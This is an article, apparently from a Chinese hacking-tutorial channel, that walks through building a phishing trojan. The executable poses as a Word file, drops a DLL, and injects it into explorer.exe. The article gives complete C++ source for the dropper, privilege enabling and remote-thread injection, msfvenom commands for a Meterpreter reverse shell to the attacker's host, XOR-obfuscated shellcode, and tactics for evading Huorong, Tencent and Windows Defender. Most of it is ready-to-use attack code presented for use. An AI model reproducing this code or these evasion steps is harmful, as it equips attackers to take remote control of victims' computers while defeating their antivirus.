**** 本文章仅供教学为目的,若该文章的技术造成财产损失,本文作者概不负责 ****
虚拟机环境
Kali Linux IP: 192.168.107.128
Windows Defender: 192.168.107.136
Windows Huorong: 192.168.107.131
Windows Tencent Anti-Virus: 192.168.107.1
程序分析
可执行过程
-
1. 当我们打开可执行文件时,我们将得到看起来像普通文档文件一样的Word文件窗口,同时我们在目录公共下载中提取恶意DLL文件。
-
2. 我们将在explorer.Exe中注入恶意的DLL文件,黑客将在他的机器中获取meterpreter shell。
-
3. 在受害者机器中删除自身程序并保持正常的Word文件
网络钓鱼部分
我们如何将Word文件存储在可执行文件中?
Visual Studio -> Resources Files -> Add -> Resouce -> import -> choose your Word file -> input docx type
恶意DLL文件将自身存储在可执行文件中的方式相同。
我们如何释放资源?
// Initialize the variables
char PathFileName[MAX_PATH] = { 0 };
char FileName[MAX_PATH] = { 0 };
char Dllpath[2*MAX_PATH] = "C:\Users\Public\Downloads\acvfunc.dll";
char FileType[10] = { 0 };
// Word File Resource Variables
HRSRC Resource;
HGLOBAL ResourceGlobal;
DWORD FileSize;
// DLL File Resource Variables
HRSRC DLL_Resource;
HGLOBAL DLL_ResourceGlobal;
DWORD DLL_FileSize;在可执行文件中找到资源,将它们加载并锁定在void pointer中
// FindResourceA
// LoadResource
Resource = FindResourceA(NULL, MAKEINTRESOURCEA(101), "docx");
DLL_Resource = FindResourceA(NULL, MAKEINTRESOURCEA(102), "dll");
ResourceGlobal = LoadResource(NULL, Resource);
DLL_ResourceGlobal = LoadResource(NULL, DLL_Resource);
FileSize = SizeofResource(NULL, Resource);
DLL_FileSize = SizeofResource(NULL, DLL_Resource);
// Lock the resource in void* pointer
LPVOID PFILE = LockResource(ResourceGlobal);
LPVOID Shellcode_Buf = LockResource(DLL_ResourceGlobal);我将文件名修改为程序名称,大家可以修改您想要的任何名称。
// Get the program name
GetModuleFileNameA(NULL, PathFileName, MAX_PATH);
strcpy_s(FileName, strrchr(PathFileName, '\') + 1);
// phishing.exe -> phishing.docx
// modify the suffix
for (size_t i = 0; i < MAX_PATH; i++)
{
if (FileName[i] == '.')
{
FileName[i + 1] = 'd';
FileName[i + 2] = 'o';
FileName[i + 3] = 'c';
FileName[i + 4] = 'x';
break;
}
}
// Create a file and write the resource in it
HANDLE FILE = CreateFileA(FileName, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL);
DWORD dwSize;
WriteFile(FILE, PFILE, FileSize, &dwSize, NULL);使用ShellExecuteExA函数打开Word文件
// open the docx file
SHELLEXECUTEINFOA shellexc = { 0 };
shellexc.cbSize = sizeof(shellexc);
shellexc.lpFile = FileName;
shellexc.nShow = SW_SHOW;
ShellExecuteExA(&shellexc);
// Donot forget close handle or you will get wrong :-(
CloseHandle(FILE);在公共路径中写入恶意DLL文件
// Sleep(10000);
// To bypass Windows Deferder, Windows defender will scan the file in 10s when you execute the file as an administrator privilege.
HANDLE DLLFILE = CreateFileA(Dllpath, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL);
DWORD dllSize;
WriteFile(DLLFILE, Shellcode_Buf, DLL_FileSize, &dllSize, NULL);
CloseHandle(DLLFILE);整个释放资源功能函数如下
#pragma once
#include "Basic.h"
// "Basic.h" include Windows.h and iostream
void free_resource() {
// Get File Name
char PathFileName[MAX_PATH] = { 0 };
char FileName[MAX_PATH] = { 0 };
char Dllpath[2*MAX_PATH] = "C:\Users\Public\Downloads\acvfunc.dll";
char FileType[10] = { 0 };
HRSRC Resource;
HGLOBAL ResourceGlobal;
DWORD FileSize;
HRSRC DLL_Resource;
HGLOBAL DLL_ResourceGlobal;
DWORD DLL_FileSize;
Resource = FindResourceA(NULL, MAKEINTRESOURCEA(101), "docx");
DLL_Resource = FindResourceA(NULL, MAKEINTRESOURCEA(102), "dll");
ResourceGlobal = LoadResource(NULL, Resource);
DLL_ResourceGlobal = LoadResource(NULL, DLL_Resource);
FileSize = SizeofResource(NULL, Resource);
DLL_FileSize = SizeofResource(NULL, DLL_Resource);
LPVOID PFILE = LockResource(ResourceGlobal);
LPVOID Shellcode_Buf = LockResource(DLL_ResourceGlobal);
GetModuleFileNameA(NULL, PathFileName, MAX_PATH);
strcpy_s(FileName, strrchr(PathFileName, '\') + 1);
for (size_t i = 0; i < MAX_PATH; i++)
{
if (FileName[i] == '.')
{
FileName[i + 1] = 'd';
FileName[i + 2] = 'o';
FileName[i + 3] = 'c';
FileName[i + 4] = 'x';
break;
}
}
// Create a file and write the resource in it
HANDLE FILE = CreateFileA(FileName, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL);
DWORD dwSize;
WriteFile(FILE, PFILE, FileSize, &dwSize, NULL);
// Create DLL FILE
// open the docx file
SHELLEXECUTEINFOA shellexc = { 0 };
shellexc.cbSize = sizeof(shellexc);
shellexc.lpFile = FileName;
shellexc.nShow = SW_SHOW;
ShellExecuteExA(&shellexc);
CloseHandle(FILE);
HANDLE DLLFILE = CreateFileA(Dllpath, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL);
DWORD dllSize;
WriteFile(DLLFILE, Shellcode_Buf, DLL_FileSize, &dllSize, NULL);
CloseHandle(DLLFILE);
}我们如何在explorer.Exe进程中注入恶意软件?
-
确保我们有较高的特权注入,否则我们将注入失败。
-
加载恶意DLL
-
打开explorer.Exe句柄
-
分配 **读写可执行文件 **DLL的内存
-
从kernel32.dll获取LoadLibaryA函数地址
-
在explorer.Exe进程下创建远程线程。
提权部分
// initialize variable
HANDLE hToken = NULL;
LUID luidValue = { 0 };
TOKEN_PRIVILEGES tokenPrivileges = { 0 };
BOOL bRet = FALSE检查我们是否像管理员一样获得高特权
bRet = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken);
if (bRet == FALSE) {
ShowError("OpenProcessToken");
return FALSE;
}
// Get Local System pszPrivileges LUID Value
bRet = LookupPrivilegeValueA(NULL, pszPrivilegesName, &luidValue);
if (bRet == FALSE) {
ShowError("LookupPrivilegeValueA");
return FALSE;
}如果我们得到了查找特权值,我们可以尝试在程序中提升我们的权限
// Set Improve Privileges info
tokenPrivileges.PrivilegeCount = 1;
tokenPrivileges.Privileges[0].Luid = luidValue;
tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Privilege Escalation
bRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, 0, 0, NULL);
if (bRet == FALSE) {
ShowError("AdjustTokenPrivileges");
return FALSE;
}
else {
dwRet = GetLastError();
if (dwRet == ERROR_SUCCESS) {
return TRUE;
}
else if (dwRet == ERROR_NOT_ALL_ASSIGNED) {
ShowError("ERROR_NOT_ALL_ASSIGNED");
return FALSE;
}
}整个提权部分
BOOL EnablePrivileges(HANDLE hProcess, LPCSTR pszPrivilegesName) {
HANDLE hToken = NULL;
LUID luidValue = { 0 };
TOKEN_PRIVILEGES tokenPrivileges = { 0 };
BOOL bRet = FALSE;
DWORD dwRet = 0;
bRet = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken);
if (bRet == FALSE) {
ShowError("OpenProcessToken");
return FALSE;
}
// Get Local System pszPrivileges LUID Value
bRet = LookupPrivilegeValueA(NULL, pszPrivilegesName, &luidValue);
if (bRet == FALSE) {
ShowError("LookupPrivilegeValueA");
return FALSE;
}
// Set Improve Privileges info
tokenPrivileges.PrivilegeCount = 1;
tokenPrivileges.Privileges[0].Luid = luidValue;
tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Privilege Escalation
bRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, 0, 0, NULL);
if (bRet == FALSE) {
ShowError("AdjustTokenPrivileges");
return FALSE;
}
else {
dwRet = GetLastError();
if (dwRet == ERROR_SUCCESS) {
return TRUE;
}
else if (dwRet == ERROR_NOT_ALL_ASSIGNED) {
ShowError("ERROR_NOT_ALL_ASSIGNED");
return FALSE;
}
}
return FALSE;
}注入DLL部分
// Initialize variable
HANDLE hProcess = NULL;
SIZE_T dwSize = 0;
LPVOID pDllAddr = NULL;
FARPROC pFuncProcAddr = NULL;分配内存
//allocated memory in the injection process
dwSize = 1 + strlen(pszDllFileName);
pDllAddr = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
if (NULL == pDllAddr)
{
ShowError("VirtualAllocEx");
return FALSE;
}在进程中写入恶意DLL文件
//Write data to the allocated memory
if (FALSE == WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL))
{
ShowError("WriteProcessMemory");
return FALSE;
}获取加载DLL文件函数地址
// Get LoadLibraryA function address
pFuncProcAddr = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
if (NULL == pFuncProcAddr)
{
ShowError("GetProcAddress_LoadLibraryA");
return FALSE;
}在进程下创建线程
// Use CreateRemoteThread to create a remote thread and implement DLL injection
HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, NULL);
if (NULL == hRemoteThread)
{
ShowError("CreateRemoteThread");
return FALSE;
}
// Close handle
CloseHandle(hProcess);整个注入功能部分
BOOL CreateRemoteThreadInjectDll(DWORD dwProcessId, const char* pszDllFileName)
{
HANDLE hProcess = NULL;
SIZE_T dwSize = 0;
LPVOID pDllAddr = NULL;
FARPROC pFuncProcAddr = NULL;
// Get Process Handle
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if (NULL == hProcess)
{
ShowError("OpenProcess");
return FALSE;
}
//allocated memory in the injection process
dwSize = 1 + strlen(pszDllFileName);
pDllAddr = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
if (NULL == pDllAddr)
{
ShowError("VirtualAllocEx");
return FALSE;
}
//Write data to the allocated memory
if (FALSE == WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL))
{
ShowError("WriteProcessMemory");
return FALSE;
}
// Get LoadLibraryA function address
pFuncProcAddr = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
if (NULL == pFuncProcAddr)
{
ShowError("GetProcAddress_LoadLibraryA");
return FALSE;
}
// Use CreateRemoteThread to create a remote thread and implement DLL injection
HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, NULL);
if (NULL == hRemoteThread)
{
ShowError("CreateRemoteThread");
return FALSE;
}
// Close handle
CloseHandle(hProcess);
return TRUE;
}最重要的是,网络钓鱼部分已经结束,
下一部分是如何绕过 火绒,腾讯电脑管家(其实和火绒一样,具体过程略)和 Windows Defender。
绕过部分
如何创建恶意的DLL文件?
老实说,我脑海中的第一个想法是通过msfvenom创建DLL。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.107.128 LPORT=4450 -f dll -0 malicious_dll.dll但它将被火绒、腾讯电脑管家和 Windows Defender 检测到。因为 msfvenom 的特征码已经被各大厂商盯死了,DLL文件一落地直接被查杀
所以我们必须自己编写DLL文件来绕过检测。如果我们的DLL文件安全着陆,我们已经绕过了防病毒静态检测。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.107.128 LPORT=4450 -f c -v shellcode使用msfvenom 创建 shellcode
ShellCode 加密
我们可以使用最简单的XOR加密来装饰shellcode。有很多种加密方式,但是我觉得shellcode加密只是绕过静态查杀,所以目的只是绕过静态查杀就行。相比于通信加密,shellcode的加密技术可以比较简单。
unsigned char encryptedShellcode[] =
"xfcx48x83xe4xf0xe8xccx00x00x00x41x51x41x50"
"x52x51x48x31xd2x65x48x8bx52x60x56x48x8bx52"
"x18x48x8bx52x20x4dx31xc9x48x8bx72x50x48x0f"
"xb7x4ax4ax48x31xc0xacx3cx61x7cx02x2cx20x41"
"xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52"
"x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x0f"
"x85x72x00x00x00x8bx80x88x00x00x00x48x85xc0"
"x74x67x48x01xd0x44x8bx40x20x49x01xd0x50x8b"
"x48x18xe3x56x48xffxc9x41x8bx34x88x4dx31xc9"
"x48x01xd6x48x31xc0xacx41xc1xc9x0dx41x01xc1"
"x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8"
"x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44"
"x8bx40x1cx49x01xd0x41x8bx04x88x41x58x48x01"
"xd0x41x58x5ex59x5ax41x58x41x59x41x5ax48x83"
"xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9"
"x4bxffxffxffx5dx49xbex77x73x32x5fx33x32x00"
"x00x41x56x49x89xe6x48x81xecxa0x01x00x00x49"
"x89xe5x49xbcx02x00x11x62xc0xa8x6bx80x41x54"
"x49x89xe4x4cx89xf1x41xbax4cx77x26x07xffxd5"
"x4cx89xeax68x01x01x00x00x59x41xbax29x80x6b"
"x00xffxd5x6ax0ax41x5ex50x50x4dx31xc9x4dx31"
"xc0x48xffxc0x48x89xc2x48xffxc0x48x89xc1x41"
"xbaxeax0fxdfxe0xffxd5x48x89xc7x6ax10x41x58"
"x4cx89xe2x48x89xf9x41xbax99xa5x74x61xffxd5"
"x85xc0x74x0ax49xffxcex75xe5xe8x93x00x00x00"
"x48x83xecx10x48x89xe2x4dx31xc9x6ax04x41x58"
"x48x89xf9x41xbax02xd9xc8x5fxffxd5x83xf8x00"
"x7ex55x48x83xc4x20x5ex89xf6x6ax40x41x59x68"
"x00x10x00x00x41x58x48x89xf2x48x31xc9x41xba"
"x58xa4x53xe5xffxd5x48x89xc3x49x89xc7x4dx31"
"xc9x49x89xf0x48x89xdax48x89xf9x41xbax02xd9"
"xc8x5fxffxd5x83xf8x00x7dx28x58x41x57x59x68"
"x00x40x00x00x41x58x6ax00x5ax41xbax0bx2fx0f"
"x30xffxd5x57x59x41xbax75x6ex4dx61xffxd5x49"
"xffxcexe9x3cxffxffxffx48x01xc3x48x29xc6x48"
"x85xf6x75xb4x41xffxe7x58x6ax00x59x49xc7xc2"
"xf0xb5xa2x56xffxd5";
char key[] = "lkdajsdwqe,sadlqwe:_)";
char cipherType[] = "xor";
// Char array to host the deciphered shellcode
unsigned char shellcode[sizeof encryptedShellcode];
unsigned char shellcode2[sizeof encryptedShellcode];
std::cout << encryptedShellcode << std::endl;
printf("nnn");
// XOR decoding stub using the key defined above must be the same as the encoding key
int j = 0;
for (int i = 0; i < sizeof encryptedShellcode; i++) {
if (j == sizeof key - 1) j = 0;
// shellcode[sizeof encryptedShellcode - 1 - i] = encryptedShellcode[i];
shellcode[i] = (encryptedShellcode[i] + 0x72) ^ key[j] ;
// shellcode[i] = (shellcode[i] ^ key[j]) - 0x72;
// shellcode[i] = encryptedShellcode[i] ^ key[j];
j++;
}
for (int i = 0; i < sizeof encryptedShellcode; i++) {
printf("\x%x", shellcode[i]);
}我们可以得到加密的 shellcode.
解密
unsigned char E_shellcode[] =
"x2xd1x91x37x8x29x5ax5x3x17x9fxb0xd2xa6xa8xb2xcdxc6x7ex88x93x91xafxb6xa9xd0x8exa0xfdxcbx98xe8xe1xdexc7x57xcbx8ax81xf8xe5xa8x45xd7xd8xdbxc9x41x7axd9xa2x8bx58xedxf3xd7x5fx4ax8xd6x49x6cx7dx33xafxd7xa2xd0x8exa0xe5x8cxd1x82xc9x12x26xb4x82x9dxefx47x2bxa8x9bx8fx16x13x18x8ex96x8dx3x17x5exc9x96x56x8axa8xcdx16x78xe9xd4xdexf9xdfx12x28xb1x99xcdxfbx30xe4xc9x10x5fxdfx8cxd1x9fx85xfcx12xd6x18x2cxdbxc9x41x7axc4x42x5ex53xc0x12x57xc6x23x90x6x84x2ax97xfax11xd3xcax29x94x2exbdxc7x98x9exe5xdax17x2exa9xc4x98x44xe5x9fx91xd9xeaxdax19x31xd7x8ax7x9fx9fxb9xdbx17x2exc2xbdxb5xf1x93x9axa6xd8xafxd2xa6xc9x91x29xe3xd6xe8x2x33xaexdfxbaxbbxdfxc7xdbx72xd1x1ax15x10xa5xc8x54x9ex94xc1xfdxd6xc5x16x1exc2xbfxdexc1x7x93x9fx35x76x12x18x1xdfx8cx26xdex2x7x13xe7xb8x43x6dxb8xc8xecxefxd7x90x32xdfx91x10xd7x5bxcfx8cxb4xax10x23xd2x8ax2bxbfx49x2cx5bx1exa0xd7x4dxf1x81xb9x5x0x22xf0xfxd2xb4xaexb3xc8xc6x1xe0x8ax5exd1x15x53xd0x88x50xcdx0x57x96x88x52xd7x40x2dxf6x34x68x2ex6exd6x90x5dxbdxe8xc0xaexc9x8ax31x96x88xaxd7x40x7ax60x83xe9x2ex6ex9bx59x82x1dxd1x2x24x90x26x3fx29x1x13x16xd6x84x29xe7x80xa4x7dxd3xc8x5fxbdx1cxc0xaexcdx8axex9fx5fx15x2fx56xa0x6x22xcfx35x5bx9cxacxdex94x5cxe1xb4x8cx19xb9x9exc0xaaxbex1exf3x5x17x89x95x93x97xfxdexc2x51xc0x48xbdx67xa0x7bx2x26xdex97x44xccx9ex3xe0x8ax57xd0x9fx3xd0x88x28xcdx8axex9fx5fx15x2fx56xa0x6x22xcfx35x5bx83xf1xaexd2xa3xb8xbex5xc3x17x5exc0xabxb8x1exbdxc4x49x47xfexa8xcex1ax23xa8xa1xc0x48x90x91xdaxffx2x26xdfx1dx31x2cxcbx4bx2ex58xd6x18x51xdbxf1x4bxdex80x19x82xaxc0x10x3dxa6xadx5xaex81x66x1dxex4cx70xa9x1bx34x16";
unsigned char* decrypt() {
unsigned char shellcode[sizeof E_shellcode];
int j = 0;
char key[] = "lkdajsdwqe,sadlqwe:_)";
for (int i = 0; i < sizeof E_shellcode; i++) {
if (j == sizeof key - 1) j = 0;
shellcode[i] = (E_shellcode[i] ^ key[j]) - 0x72;
j++;
}
return shellcode;
}jmp_shellcode 函数 通过回调函数,来直接执行shellcode
DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
unsigned char* addrShellcode = decrypt();
DWORD dwOldPro = 0;
BOOL ifExec = VirtualProtect(addrShellcode, sizeof(E_shellcode), PAGE_EXECUTE_READWRITE, &dwOldPro);
// Callback function can bypass a lot of Anti-Virus softwares
EnumUILanguages((UILANGUAGE_ENUMPROC)addrShellcode, 0, 0);
return 0;
}DLL MAIN 函数
HANDLE hThread = NULL;
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
decrypt();
DisableThreadLibraryCalls(hModule);
hThread = CreateThread(NULL, 0, jmp_shellcode, 0, 0, 0);
MessageBox(NULL, L"You are hacked ", L"Hacked by Leviathan", MB_OK);
}
else if (dwReason == DLL_PROCESS_DETACH)
{
}
return TRUE;
}整个DLL_File源代码
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <windows.h>
#include <stdlib.h>
typedef void(__stdcall* JMP_SHELLCODE)();
//unsigned char shellcode[] =
//"xfcx48x83xe4xf0xe8xccx00x00x00x41x51x41x50"
//"x52x51x48x31xd2x56x65x48x8bx52x60x48x8bx52"
//"x18x48x8bx52x20x4dx31xc9x48x0fxb7x4ax4ax48"
//"x8bx72x50x48x31xc0xacx3cx61x7cx02x2cx20x41"
//"xc1xc9x0dx41x01xc1xe2xedx52x48x8bx52x20x41"
//"x51x8bx42x3cx48x01xd0x66x81x78x18x0bx02x0f"
//"x85x72x00x00x00x8bx80x88x00x00x00x48x85xc0"
//"x74x67x48x01xd0x8bx48x18x50x44x8bx40x20x49"
//"x01xd0xe3x56x48xffxc9x4dx31xc9x41x8bx34x88"
//"x48x01xd6x48x31xc0x41xc1xc9x0dxacx41x01xc1"
//"x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8"
//"x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44"
//"x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41"
//"x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83"
//"xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9"
//"x4bxffxffxffx5dx49xbex77x73x32x5fx33x32x00"
//"x00x41x56x49x89xe6x48x81xecxa0x01x00x00x49"
//"x89xe5x49xbcx02x00x11x62xc0xa8x6bx80x41x54"
//"x49x89xe4x4cx89xf1x41xbax4cx77x26x07xffxd5"
//"x4cx89xeax68x01x01x00x00x59x41xbax29x80x6b"
//"x00xffxd5x6ax0ax41x5ex50x50x4dx31xc9x4dx31"
//"xc0x48xffxc0x48x89xc2x48xffxc0x48x89xc1x41"
//"xbaxeax0fxdfxe0xffxd5x48x89xc7x6ax10x41x58"
//"x4cx89xe2x48x89xf9x41xbax99xa5x74x61xffxd5"
//"x85xc0x74x0ax49xffxcex75xe5xe8x93x00x00x00"
//"x48x83xecx10x48x89xe2x4dx31xc9x6ax04x41x58"
//"x48x89xf9x41xbax02xd9xc8x5fxffxd5x83xf8x00"
//"x7ex55x48x83xc4x20x5ex89xf6x6ax40x41x59x68"
//"x00x10x00x00x41x58x48x89xf2x48x31xc9x41xba"
//"x58xa4x53xe5xffxd5x48x89xc3x49x89xc7x4dx31"
//"xc9x49x89xf0x48x89xdax48x89xf9x41xbax02xd9"
//"xc8x5fxffxd5x83xf8x00x7dx28x58x41x57x59x68"
//"x00x40x00x00x41x58x6ax00x5ax41xbax0bx2fx0f"
//"x30xffxd5x57x59x41xbax75x6ex4dx61xffxd5x49"
//"xffxcexe9x3cxffxffxffx48x01xc3x48x29xc6x48"
//"x85xf6x75xb4x41xffxe7x58x6ax00x59x49xc7xc2"
//"xf0xb5xa2x56xffxd5";
unsigned char E_shellcode[] =
"x2xd1x91x37x8x29x5ax5x3x17x9fxb0xd2xa6xa8xb2xcdxc6x7ex88x93x91xafxb6xa9xd0x8exa0xfdxcbx98xe8xe1xdexc7x57xcbx8ax81xf8xe5xa8x45xd7xd8xdbxc9x41x7axd9xa2x8bx58xedxf3xd7x5fx4ax8xd6x49x6cx7dx33xafxd7xa2xd0x8exa0xe5x8cxd1x82xc9x12x26xb4x82x9dxefx47x2bxa8x9bx8fx16x13x18x8ex96x8dx3x17x5exc9x96x56x8axa8xcdx16x78xe9xd4xdexf9xdfx12x28xb1x99xcdxfbx30xe4xc9x10x5fxdfx8cxd1x9fx85xfcx12xd6x18x2cxdbxc9x41x7axc4x42x5ex53xc0x12x57xc6x23x90x6x84x2ax97xfax11xd3xcax29x94x2exbdxc7x98x9exe5xdax17x2exa9xc4x98x44xe5x9fx91xd9xeaxdax19x31xd7x8ax7x9fx9fxb9xdbx17x2exc2xbdxb5xf1x93x9axa6xd8xafxd2xa6xc9x91x29xe3xd6xe8x2x33xaexdfxbaxbbxdfxc7xdbx72xd1x1ax15x10xa5xc8x54x9ex94xc1xfdxd6xc5x16x1exc2xbfxdexc1x7x93x9fx35x76x12x18x1xdfx8cx26xdex2x7x13xe7xb8x43x6dxb8xc8xecxefxd7x90x32xdfx91x10xd7x5bxcfx8cxb4xax10x23xd2x8ax2bxbfx49x2cx5bx1exa0xd7x4dxf1x81xb9x5x0x22xf0xfxd2xb4xaexb3xc8xc6x1xe0x8ax5exd1x15x53xd0x88x50xcdx0x57x96x88x52xd7x40x2dxf6x34x68x2ex6exd6x90x5dxbdxe8xc0xaexc9x8ax31x96x88xaxd7x40x7ax60x83xe9x2ex6ex9bx59x82x1dxd1x2x24x90x26x3fx29x1x13x16xd6x84x29xe7x80xa4x7dxd3xc8x5fxbdx1cxc0xaexcdx8axex9fx5fx15x2fx56xa0x6x22xcfx35x5bx9cxacxdex94x5cxe1xb4x8cx19xb9x9exc0xaaxbex1exf3x5x17x89x95x93x97xfxdexc2x51xc0x48xbdx67xa0x7bx2x26xdex97x44xccx9ex3xe0x8ax57xd0x9fx3xd0x88x28xcdx8axex9fx5fx15x2fx56xa0x6x22xcfx35x5bx83xf1xaexd2xa3xb8xbex5xc3x17x5exc0xabxb8x1exbdxc4x49x47xfexa8xcex1ax23xa8xa1xc0x48x90x91xdaxffx2x26xdfx1dx31x2cxcbx4bx2ex58xd6x18x51xdbxf1x4bxdex80x19x82xaxc0x10x3dxa6xadx5xaex81x66x1dxex4cx70xa9x1bx34x16";
unsigned char* decrypt() {
unsigned char shellcode[sizeof E_shellcode];
int j = 0;
char key[] = "lkdajsdwqe,sadlqwe:_)";
for (int i = 0; i < sizeof E_shellcode; i++) {
if (j == sizeof key - 1) j = 0;
shellcode[i] = (E_shellcode[i] ^ key[j]) - 0x72;
j++;
}
return shellcode;
}
DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
unsigned char* addrShellcode = decrypt();
DWORD dwOldPro = 0;
BOOL ifExec = VirtualProtect(addrShellcode, sizeof(E_shellcode), PAGE_EXECUTE_READWRITE, &dwOldPro);
EnumUILanguages((UILANGUAGE_ENUMPROC)addrShellcode, 0, 0);
return 0;
}
HANDLE hThread = NULL;
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
decrypt();
DisableThreadLibraryCalls(hModule);
hThread = CreateThread(NULL, 0, jmp_shellcode, 0, 0, 0);
MessageBox(NULL, L"You are hacked ", L"Hacked by Leviathan", MB_OK);
}
else if (dwReason == DLL_PROCESS_DETACH)
{
}
return TRUE;
}
绕过火绒
难度: 3.0/5.0
当恶意软件着陆受害者机器时,直接绕过火绒防病毒静态检测。
执行它,我们将得到弹窗 ‘Hacked by Leviathan’,同时会打开我们的钓鱼Word文件,让执行者认为打开了正常的Word文件。实战中可以把弹窗取消,实验阶段只是更好证明shellcode已经运行。
在MSF,我们得到了shell,所以火绒就是这样被绕过的。
绕过 Windows Defender
难度: 4.5/5.0
我们也可以绕过 Windows Defender 静态检测
我们将恶意dll加载到公共下载目录中,到目前为止看起来不错。
但是我们无法获得外壳,windows defender 将检测到我们将未知的DLL文件注入explorer.exe
我们得到了Windows Defender 防御威胁报告。现在我们必须尝试其他方法来获得shell。
我们在敏感行为 (如GetProcAddress、CreateRemoteThread和VirutalAllocEx) 之前设置了Sleep函数。
在公共目录中写入文件之前,多睡一会儿。(否则 Windows Defender 会很快检测到)
如果我们以管理员权限运行,Windows Defender将自动扫描它.
尝试我们注入的另一个进程,在这种情况下,我尝试在ctfmon.exe进程中注入DLL文件,并将DLL文件保存在管理员下载目录中。同时我把DLL里面的加密密钥换了一下,不得不说 Windows Defender会把文件特征码和服务器做识别(或者是传到服务器)查杀的效率越来越高,让人防不胜防。
在这种情况下,注入 PhoneExperienceHost.exe。
我们成功地得到了最终的shell。
总结
-
作为恶意软件研究学习者,我们必须了解不同防病毒软件中的特性行为。不同的防病毒软件有自己的检测方法。例如,Windows Defender会更加关注敏感目录 (公共目录等)。火绒在国内反病毒软件中更擅长进行静态检测。
-
DLL注入相对容易实现,但同时也相对容易被检测。因此,在开发特洛伊木马之前,请确保您在受害者机器中获得了系统重要信息 (系统版本、防病毒等)。
-
该程序仍需要在许多方面进行改进,如通信加密、更多隐藏方式注入、权限持维持等。
-
如果你的木马被杀软查杀,那就换个思考方式继续进行吧。
推荐阅读:
2022年零基础+进阶系统化白帽黑客学习 | 11月特别优惠活动
点赞,转发,在看
原创投稿作者:Leviathan
原文始发于微信公众号(HACK学习呀):实战 | 记一次Word文档网络钓鱼以及绕过火绒,电脑管家和Windows Defender
